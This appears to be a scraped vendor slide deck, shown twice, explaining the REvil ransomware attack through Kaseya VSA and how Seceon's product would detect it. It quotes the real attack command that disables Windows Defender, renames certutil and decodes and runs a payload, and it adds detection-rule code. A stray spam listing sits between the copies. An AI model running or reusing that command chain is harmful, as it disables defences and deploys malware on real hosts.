How Seceon could have stopped
the Ransomware roll over Kaseya.
Attacks and attack methods keep changing. One of the most recent, the attack on Kaseya,
shows what the industry is still missing in terms of cybersecurity, and where.
The attack on Kaseya took place a few days ago. It emerged suddenly and brutally,
infecting around 1500 businesses worldwide according to a statement by Kaseya's CEO.
The names of the infected companies have not yet been released. One visible result
was the Swedish Coop supermarket chain, which was forced to close its stores. Coop is
a client of one of the MSPs that were hacked, and 2100 of its endpoints were infected.
A $70 million ransom was demanded for the return of the data.
The REvil ransomware gang is considered responsible for this operation. It is still
unclear whether REvil prepared the attack themselves or one of their affiliates did.
Kaseya was forced to shut down its entire cloud infrastructure to stop the malicious
update from spreading, and it advised all customers to power down their VSA servers,
which created a great deal of chaos.
What is VSA, how was it compromised, and how did the ransomware roll over it?
VSA is a remote monitoring and management tool, a kind of remote access tool (RAT),
that gives complete access to the system or device it is installed on, so that IT
technicians can diagnose and fix problems remotely. Not every organization has the
resources to manage its infrastructure in house, so many outsource that task to a
Managed Service Provider (MSP). These MSPs often manage the systems of hundreds of
companies simultaneously.
Kaseya is a vendor to MSPs, and VSA is its product. VSA also comes in an on-premises
version that the customer runs in its own environment; MSPs typically need this to
manage all of their client systems, and it was such a Kaseya VSA server, used to manage
a large number of clients, that was compromised. Access to this server by itself grants
access to every client associated with it, and this is how the initial compromise
happened.
Soon after the attack rolled out, all VSA servers were advised to be shut down. The
operation was large enough to take out whole businesses. It was mass ransomware, unlike
the ransomware we usually see, where a single organization is infected, all of its
systems are encrypted and a ransom is demanded. Here the case was quite different:
hundreds of organizations around the world were encrypted simultaneously by the same
ransomware campaign, which was tunnelled through a Kaseya software update. From its
inception it moved as a supply chain attack.
It was a compromise of Kaseya that operated through the VSA server rather than through
a victim's own directory, as we usually see with ransomware. The VSA server was used to
ransomware a large number of organizations in a single click, and that, at a high level,
is what happened.
How does it propagate?
The scenario is this: a device runs Kaseya's agent, which monitors every device subject
to a policy and is connected to a central server. If that server is compromised, every
system connected to it is at high risk. This is how the attack propagated as a chain,
one hop after another, and affected thousands of servers.
How did the initial compromise begin, and how would aiXDR have detected it?
A VSA server vulnerability was exploited. Seceon aiXDR can detect and remediate
exploited vulnerabilities and zero-day attacks at a very early stage. Here is the
step-by-step analysis:
1. aiXDR monitors all inbound and outbound connections. In this case aiXDR should have
detected a connection from a blacklisted IP or from a prohibited country and
automatically blocked that connection.
2. Once the connection was made, it attempted to download/upload agent.exe on the host.
aiXDR can detect data exfiltration, and in this case it should have blocked the
connection so that agent.exe could not be downloaded and no data could be transferred
to external hosts.
3. Once the host had agent.exe, it ran different types of scans to gain access to other
hosts. aiXDR should have detected those scans and automatically quarantined the host so
that it could not infect other hosts.
4. The following command was launched by the C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe
file of the Kaseya VSA platform:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul &
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference
-DisableRealtimeMonitoring $true
-DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true
-DisableScriptScanning $true
-EnableControlledFolderAccess Disabled
-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled
-SubmitSamplesConsent NeverSend & copy /Y
C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo
%RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe
-decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f
c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
5. As AgentMon.exe starts its first child process to execute the PowerShell command,
aiXDR would have detected a new process started by AgentMon.exe from
C:\Program Files (x86)\Kaseya.
6. aiXDR detects when any protection service is disabled on the host; as we can see, in
this case they were trying to disable the protection services.
7. aiXDR detects when a process is renamed (masquerading); as we can see, in this case
certutil.exe was copied and renamed to cert.exe.
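The detections in steps 5 to 7 can be written down as rules over process-creation telemetry. The following is an added example, written for this page and not Seceon's or Kaseya's code: it runs such rules over a few constructed Sysmon-style process events. The field names, PIDs, the AGENTID directory name and the benign certutil event are assumptions; the malicious command line is the one quoted in step 4.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Constructed process-creation record, shaped like the fields Sysmon Event ID 1 carries."""
    pid: int
    ppid: int
    image: str                    # full path of the executable that started
    parent_image: str             # full path of the parent executable
    command_line: str
    original_file_name: str = ""  # OriginalFileName from the PE version resource


KASEYA_AGENT_DIR = r"c:\program files (x86)\kaseya"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Set-MpPreference with any switch that weakens Defender (the quoted command uses all of these).
DEFENDER_TAMPER = re.compile(
    r"set-mppreference.*?(-disable\w+\s+\$true|-mapsreporting\s+disabled"
    r"|-submitsamplesconsent\s+neversend|-enablecontrolledfolderaccess\s+disabled)",
    re.IGNORECASE | re.DOTALL)
# "ping 127.0.0.1 -n <large count>" is a common delay trick; the quoted command uses 4979.
PING_SLEEP = re.compile(r"ping(?:\.exe)?\s+127\.0\.0\.1\s+-n\s+(\d+)", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def kaseya_agent_spawned_shell(ev: ProcessEvent) -> bool:
    """Step 5: a shell started by AgentMon.exe out of the Kaseya install directory."""
    return (basename(ev.parent_image) == "agentmon.exe"
            and ev.parent_image.lower().startswith(KASEYA_AGENT_DIR)
            and basename(ev.image) in SHELLS)


def disables_defender(command_line: str) -> bool:
    """Step 6: protection services switched off through Set-MpPreference."""
    return DEFENDER_TAMPER.search(command_line) is not None


def long_ping_sleep(command_line: str, min_count: int = 60) -> bool:
    m = PING_SLEEP.search(command_line)
    return m is not None and int(m.group(1)) >= min_count


def is_masquerade(ev: ProcessEvent) -> bool:
    """Step 7: the file on disk was renamed, but the PE OriginalFileName still says what
    it really is (copying certutil.exe to cert.exe and appending bytes does not change it)."""
    return bool(ev.original_file_name) and ev.original_file_name.lower() != basename(ev.image)


def certutil_decode(ev: ProcessEvent) -> bool:
    """certutil, under any file name, used with -decode to turn a dropped file into an executable."""
    return (ev.original_file_name.lower() == "certutil.exe"
            and re.search(r"\s-decode\s", ev.command_line, re.IGNORECASE) is not None)


RULES = [
    ("kaseya_agent_spawned_shell", kaseya_agent_spawned_shell),
    ("defender_tampering", lambda ev: disables_defender(ev.command_line)),
    ("ping_sleep_delay", lambda ev: long_ping_sleep(ev.command_line)),
    ("renamed_system_binary", is_masquerade),
    ("certutil_decode", certutil_decode),
]


def analyze(events):
    """Return (rule_name, pid) for every event that matches a rule."""
    return [(name, ev.pid) for ev in events for name, rule in RULES if rule(ev)]


def sample_events():
    agent = r"C:\Program Files (x86)\Kaseya\AGENTID\AgentMon.exe"  # AGENTID stands in for the per-agent <ID>
    chain = (r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
             r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference "
             r"-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true "
             r"-DisableIOAVProtection $true -DisableScriptScanning $true "
             r"-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force "
             r"-MAPSReporting Disabled -SubmitSamplesConsent NeverSend & "
             r"copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & "
             r"echo %RANDOM% >> C:\Windows\cert.exe & "
             r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & "
             r"del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe")
    return [
        ProcessEvent(200, 100, r"C:\WINDOWS\system32\cmd.exe", agent, chain, "Cmd.Exe"),
        ProcessEvent(201, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     r"C:\WINDOWS\system32\cmd.exe",
                     "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -Force",
                     "PowerShell.EXE"),
        ProcessEvent(202, 200, r"C:\Windows\cert.exe", r"C:\WINDOWS\system32\cmd.exe",
                     r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe",
                     "CertUtil.exe"),
        # Benign (constructed): certutil under its own name verifying a certificate.
        ProcessEvent(301, 50, r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
                     r"certutil -verify C:\temp\site.cer", "CertUtil.exe"),
    ]


if __name__ == "__main__":
    for rule_name, pid in analyze(sample_events()):
        print(f"{rule_name}: pid {pid}")
```

The masquerading rule is the one worth noting: appending `%RANDOM%` to the copied binary changes its hash, so hash-based matching misses it, but the OriginalFileName recorded by the sensor still reads CertUtil.exe, which is what the comparison keys on.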
What was the impact of this?
The threat actor was able to execute code that let them reach the scripts linked to
Kaseya's application, which pull out certain procedures or agent updates. Pushing
procedures out to all managed agents is part of the application's normal functionality;
these agents run on the computers managed by the solution. The attacker simply ran the
script against all managed clients, which triggered a file copy and script execution on
every one of them. This is how they ended up infecting all of these systems.
Several steps were carried out one after another to make the attack fully successful,
yet surprisingly none of them was noticed or detected along the way.
Approach after infection
There are always indicators left on a system that show whether, and how, it was
compromised. In this case it was identified that logs had been cleared at multiple
stages: the system logs were gone and other logs inside the application database itself
were deleted, but some logs remained that showed what the VSA server had pushed out to
manage its clients. These logs became the starting point for investigating how the
systems were targeted from the VSA server.
A few indications of ransomware
Ransomware has become a complete business model and the threat actors make a lot of
money from it. Below are a few indications:
• All files on the system are encrypted and a README file is left stating the ransom
amount. The file extensions are changed, which is a clear indication that an attack
has occurred.
• Some files may or may not be encrypted; this happens when the ransomware did not
execute successfully, i.e. it ran only partially.
• Preparatory execution that disables antivirus functionality such as Windows Defender
or other security layers.
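The first two indications above (a burst of extension changes with a dropped note, and the uneven coverage a partial run leaves behind) can be checked from file-system events. The following is an added example, not code from Seceon or from the original deck; the event format, the note file names, the `lock9z` extension and the directory paths are constructed for illustration.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass
class FileEvent:
    """Constructed file-activity record: one rename or create with a timestamp in seconds."""
    ts: float
    op: str              # "rename" or "create"
    path: str
    new_path: str = ""   # only for renames


# Constructed list of ransom-note file names; real families use many others.
NOTE_NAMES = {"readme.txt", "readme.html", "readme-to-decrypt.txt", "how_to_restore.txt"}


def dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def ext(path: str) -> str:
    name = basename(path)
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def burst_count(times, window: float) -> int:
    """Largest number of timestamps that fall inside any span of `window` seconds."""
    times = sorted(times)
    best = j = 0
    for i, t in enumerate(times):
        while times[j] < t - window:
            j += 1
        best = max(best, i - j + 1)
    return best


def detect(events, window: float = 10.0, min_renames: int = 20):
    """Return a finding for the first extension applied to at least `min_renames`
    files within `window` seconds, or None when no such burst exists."""
    times_by_ext = defaultdict(list)
    dirs_by_ext = defaultdict(Counter)
    for ev in events:
        if ev.op == "rename" and ext(ev.new_path) and ext(ev.new_path) != ext(ev.path):
            e = ext(ev.new_path)
            times_by_ext[e].append(ev.ts)
            dirs_by_ext[e][dirname(ev.new_path)] += 1
    note_dirs = {dirname(ev.path) for ev in events
                 if ev.op == "create" and basename(ev.path).lower() in NOTE_NAMES}
    for e, times in times_by_ext.items():
        n = burst_count(times, window)
        if n >= min_renames:
            touched = dirs_by_ext[e]
            return {
                "extension": e,
                "renames": n,
                "directories": dict(touched),   # uneven per-directory counts hint at a partial run
                "note_dirs": sorted(note_dirs & set(touched)),
            }
    return None


def sample_events():
    docs = r"C:\Users\alice\Documents"
    pics = r"C:\Users\alice\Pictures"
    # 25 documents renamed to a new extension within 2.5 seconds, then a note dropped.
    evs = [FileEvent(100.0 + i * 0.1, "rename", rf"{docs}\doc{i}.docx", rf"{docs}\doc{i}.docx.lock9z")
           for i in range(25)]
    evs.append(FileEvent(103.0, "create", rf"{docs}\README.txt"))
    # Benign (constructed): an image editor finishing three files by renaming .tmp to .jpg.
    evs += [FileEvent(200.0 + i, "rename", rf"{pics}\img{i}.jpg.tmp", rf"{pics}\img{i}.jpg")
            for i in range(3)]
    return evs


if __name__ == "__main__":
    print(detect(sample_events()))
```

The per-directory counts in the finding are what a responder compares against the number of files actually present: a directory where only a fraction of the files carry the new extension is the second indication above, a run that stopped part way.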
Brief about Seceon aiXDR
Seceon aiXDR is highly effective, enriched with machine learning, AI, big data, dynamic
threat intelligence, strong correlation and in-depth analysis, which lets it cut a
threat off at the root at a very early stage.
The solution detects the origin of a threat, whether it comes from the network, an
application or a host, or is surfaced by machine learning. One of its most interesting
features is showing anything and everything that was done during the attack attempt and
how the Seceon solution stopped it along the way, keeping the environment secure with
360-degree comprehensive visibility, proactive threat detection, and automatic stopping
of threats and breaches in real time.
Customers should always make sure they are not just buying a solution that is specific
to one problem; the solution should be capable of protecting the environment from all
kinds of threats and malicious activity, whether known or unknown.
Seceon aiXDR is a single all-in-one platform. It helps eliminate the use of siloed
solutions and delivers effective, essential results in a comprehensive manner.
Diagram: the Seceon aiXDR approach, "Continuous real-time Monitoring, proactive
Detection & auto Stop threats and breaches", Best Cybersecurity ROI.
Contact Us
Address - 238 Littleton Road, Suite #206, Westford, MA 01886, USA
Phone Number - +1 (978)-923-0040
Email Id - sales@seceon.com, info@seceon.com
Website - https://www.seceon.com/
Twitter - https://twitter.com/Seceon_Inc

Socio-economic-Impact-of-business-consumers-suppliers-and.pptx
 
Forklift Operations: Safety through Cartoons
Forklift Operations: Safety through CartoonsForklift Operations: Safety through Cartoons
Forklift Operations: Safety through Cartoons
 
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service AvailableCall Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
 

How Seceon could have stopped the Ransomware roll over Kaseya.pptx

How Seceon could have stopped the Ransomware roll over Kaseya.

Attacks and attack methods keep changing. The recent attack on Kaseya is the result of what the industry is still missing in terms of cybersecurity, and where.

The attack on Kaseya came to light a few days ago. It emerged suddenly and brutally, infecting around 1500 businesses worldwide according to a statement by Kaseya's CEO. The names of the infected companies are not yet out. One observed result of the attack was the Swedish Coop supermarket chain, which was forced to close. Coop is a client of one of the MSPs that were hacked, and it was infected on 2100 endpoints.

A $70 million ransom was demanded for the data. The REvil ransomware gang is considered responsible for this operation. It is still a mystery whether REvil prepared this attack themselves or whether it came from one of their associates. Kaseya was forced to shut down its cloud infrastructure completely to stop the malicious updates from spreading, and it advised all customers to power down their servers, which created a lot of chaos.

What is VSA, how it got compromised and how the ransomware rolled over it

VSA is a remote monitoring tool, a kind of remote access tool (RAT) that gives complete access to the system or device it is installed on, which lets IT technicians diagnose and fix problems remotely. Not every organization has the resources to manage its infrastructure in house, so many outsource the task to an MSP (Managed Service Provider). These MSPs often manage the systems of hundreds of companies simultaneously.

Kaseya sells VSA to MSPs. VSA has an on-premises version that the customer runs in their own environment; MSPs typically need it to manage all their clients' systems, and such a Kaseya server, used to manage many clients, is what went wrong here. Having access to this server gives access to every client associated with it, and this is how the initial compromise happened. Soon after the attack rolled out, all VSA servers were advised to be shut down.

The operation was large: it was mass ransomware, unlike the ransomware we usually know, where one organization gets infected, all its systems get encrypted and a ransom is demanded. Here the case was quite different: hundreds of organizations around the world were encrypted simultaneously by the same ransomware campaign, which was tunnelled through the software update in Kaseya. From its inception it moved as a supply chain attack.

It was a compromise of Kaseya that was operated through the VSA server rather than directly through any victim's directory, as we usually see with ransomware. The VSA server was used to deploy ransomware to many organizations in a single click; that, at a high level, is what happened.

How does it propagate?

The scenario is this: if a device uses Kaseya's agent, which monitors all devices subject to policy and is connected to a central server, and that server is compromised, then every system connected to it is at high risk. This is how the attack propagated as a chain, one system after another, and affected thousands of servers.

How did the initial compromise begin, and how does aiXDR detect it?

A VSA server vulnerability was exploited. Seceon aiXDR can detect and remediate exploited vulnerabilities and zero-day attacks at a very early stage. Here is the step-by-step analysis:

1. aiXDR monitors all inbound and outbound connections; in this case aiXDR should have detected a connection from blacklisted IPs or from a prohibited country and automatically blocked it.

2. Once the connection was made, it tried to download/upload agent.exe on the host. aiXDR can detect data exfiltration, and in this case it should have blocked that connection so that the host could not download agent.exe or transfer data to external hosts.

3. Once agent.exe was on the host, it ran different types of scans to gain access to other hosts. aiXDR should have detected those scans and automatically quarantined that host so it could not infect other hosts.

4. The following PowerShell command was launched by the C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe file of the Kaseya VSA platform:

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

5. As AgentMon.exe starts its first process to execute the PowerShell command, aiXDR would have detected a new process started by AgentMon.exe from C:\Program Files (x86)\Kaseya.

6. aiXDR detects when any protection service is disabled on the host; as we can see in this case, the command tried to disable the protection services.

7. aiXDR detects when a process is renamed (masquerading); as we can see in this case, certutil.exe was renamed to cert.exe.

What was the impact of this?

The threat actor was able to execute code that let them search for scripts linked with Kaseya's application in order to pull out certain procedures or agent updates. Pushing procedures out to all managed agents is part of the application's normal functionality; these agents run on the computers that the solution manages. The attackers simply ran the script against all managed clients, which triggered a file copy and execution of the script on every managed client. This is how they ended up infecting all these systems. The attack consisted of a couple of steps carried out one after another, yet surprisingly none of them was noticed or detected in between.
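The checks in steps 5 to 7 above can be written as plain detection rules over process-creation telemetry. The Python below is an added example written for this page; it is not Seceon's code and not part of the slides. It assumes Sysmon-style events with parent image, image and command line fields, and runs over a constructed set of four events: event 2 carries the command line quoted above (with a made-up folder name standing in for the <ID> placeholder), the others are benign activity. The rules flag the shell spawned by AgentMon.exe, the Set-MpPreference tampering, the copy of certutil.exe to cert.exe (or a -decode call from a binary not named certutil.exe), and the leading ping loop, which is a sleep of roughly 83 minutes used to outwait short monitoring windows.

```python
import re

# Constructed sample: the command line quoted on the slides, re-typed with its
# backslashes. "WXYZ01" stands in for the <ID> folder placeholder.
KASEYA_CMD = (
    r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
    r'-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true '
    r'-DisableIOAVProtection $true -DisableScriptScanning $true '
    r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode '
    r'-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & '
    r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
    r'echo %RANDOM% >> C:\Windows\cert.exe & '
    r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & '
    r'del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe'
)

# Constructed Sysmon Event ID 1 style records (parent image, image, command line).
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt'},
    {"id": 2, "parent": r"C:\Program Files (x86)\Kaseya\WXYZ01\AgentMon.exe",
     "image": r"C:\WINDOWS\system32\cmd.exe", "cmdline": KASEYA_CMD},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",          # legitimate certutil use
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\tools\installer.msi SHA256"},
    {"id": 4, "parent": r"C:\Windows\explorer.exe",              # admin reading Defender state
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-MpPreference"},
]


def basename(path: str) -> str:
    """Last path component, lower-cased, with surrounding quotes removed."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def rule_shell_from_vsa_agent(ev: dict) -> bool:
    # Step 5: AgentMon.exe under the Kaseya install tree spawning a command shell.
    return ("\\kaseya\\" in ev["parent"].lower()
            and basename(ev["parent"]) == "agentmon.exe"
            and basename(ev["image"]) in {"cmd.exe", "powershell.exe"})


DEFENDER_TAMPER = re.compile(
    r"set-mppreference.*?(-disable\w+\s+\$true|-enablecontrolledfolderaccess\s+disabled"
    r"|-mapsreporting\s+disabled|-submitsamplesconsent\s+neversend"
    r"|-enablenetworkprotection\s+auditmode)",
    re.IGNORECASE | re.DOTALL,
)


def rule_defender_tamper(ev: dict) -> bool:
    # Step 6: Set-MpPreference used to switch Defender protections off.
    return DEFENDER_TAMPER.search(ev["cmdline"]) is not None


COPY_CERTUTIL = re.compile(r"\bcopy\s+(?:/y\s+)?(\S*certutil\.exe)\s+(\S+)", re.IGNORECASE)
DECODE_CALL = re.compile(r"(\S+\.exe)\s+-decode\b", re.IGNORECASE)


def rule_certutil_masquerade(ev: dict) -> bool:
    # Step 7: certutil.exe copied under another name, or a -decode invocation
    # made by a binary that is not called certutil.exe.
    cl = ev["cmdline"]
    if any(basename(m.group(2)) != "certutil.exe" for m in COPY_CERTUTIL.finditer(cl)):
        return True
    return any(basename(m.group(1)) != "certutil.exe" for m in DECODE_CALL.finditer(cl))


PING_SLEEP = re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+(\d+)", re.IGNORECASE)


def rule_ping_delay(ev: dict, min_count: int = 60) -> bool:
    # "ping 127.0.0.1 -n 4979" is a sleep of about 83 minutes before the payload runs.
    m = PING_SLEEP.search(ev["cmdline"])
    return m is not None and int(m.group(1)) >= min_count


RULES = {
    "shell_spawned_by_vsa_agent": rule_shell_from_vsa_agent,
    "defender_protection_disabled": rule_defender_tamper,
    "certutil_masquerade_or_decode": rule_certutil_masquerade,
    "ping_loop_delay": rule_ping_delay,
}


def analyze_events(events: list) -> dict:
    """Return {event id: [names of rules that fired]} for every flagged event."""
    hits = {}
    for ev in events:
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits[ev["id"]] = fired
    return hits


if __name__ == "__main__":
    for ev_id, fired in analyze_events(SAMPLE_EVENTS).items():
        print(f"event {ev_id}: {', '.join(fired)}")
```

AgentMon.exe legitimately runs scripts on every VSA-managed host, so the first rule on its own is a hunting signal rather than a reason to block; it is the combination of all four rules firing on a single command line, as they do for event 2 here, that justifies automatic quarantine of the host.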
Approach after infection

There are always indicators left on a system that show how it was compromised. In this case it was identified that logs had been cleared at multiple stages: the logs were gone, and other types of logs inside the application database itself had been deleted, but some logs remained that showed what the VSA server had pushed out to manage clients. These logs became the starting point for investigating how the systems were targeted from the VSA server.

A few indications of ransomware

Ransomware has become a complete business model, and the threat actors make a lot of money out of it. A few indications are listed below:

• All files on the system get encrypted and a README file is left behind stating the ransom amount. The file extensions change, which is a clear indication that an attack has occurred.

• Some files may or may not get encrypted; this happens when the ransomware did not execute successfully, i.e. it executed only partially.

• Provisional execution that disables antivirus functionality such as Windows Defender or other security layers.

Brief about Seceon aiXDR

Seceon aiXDR is highly effective, enriched with machine learning, AI, big data, dynamic threat intel, strong correlation and in-depth analysis, which lets it cut the threat off at its roots at a very early stage. The solution detects the threat's origin, whether it comes from the network, an application or a host, using machine learning. One of its most interesting features shows anything and everything that was done to make the attack attempt and how the Seceon solution stopped it along the way to make the
environment secure, with 360-degree comprehensive visibility, proactive threat detection, and automatic stopping of threats and breaches in real time. Customers should always make sure that they are not just buying a solution for one specific problem; the solution should be capable of protecting the environment from all kinds of threats and malicious activity, whether known or unknown. Seceon aiXDR is a single all-in-one platform that helps eliminate silo-based solutions and delivers the essential results effectively and comprehensively.

[Diagram: the Seceon aiXDR approach, "Continuous real-time Monitoring, proactive Detection & auto Stop threats and breaches". Best Cybersecurity ROI.]

Contact Us

Address - 238 Littleton Road, Suite #206, Westford, MA 01886, USA
Phone Number - +1 (978)-923-0040
Email Id - sales@seceon.com, info@seceon.com
Website - https://www.seceon.com/
Twitter - https://twitter.com/Seceon_Inc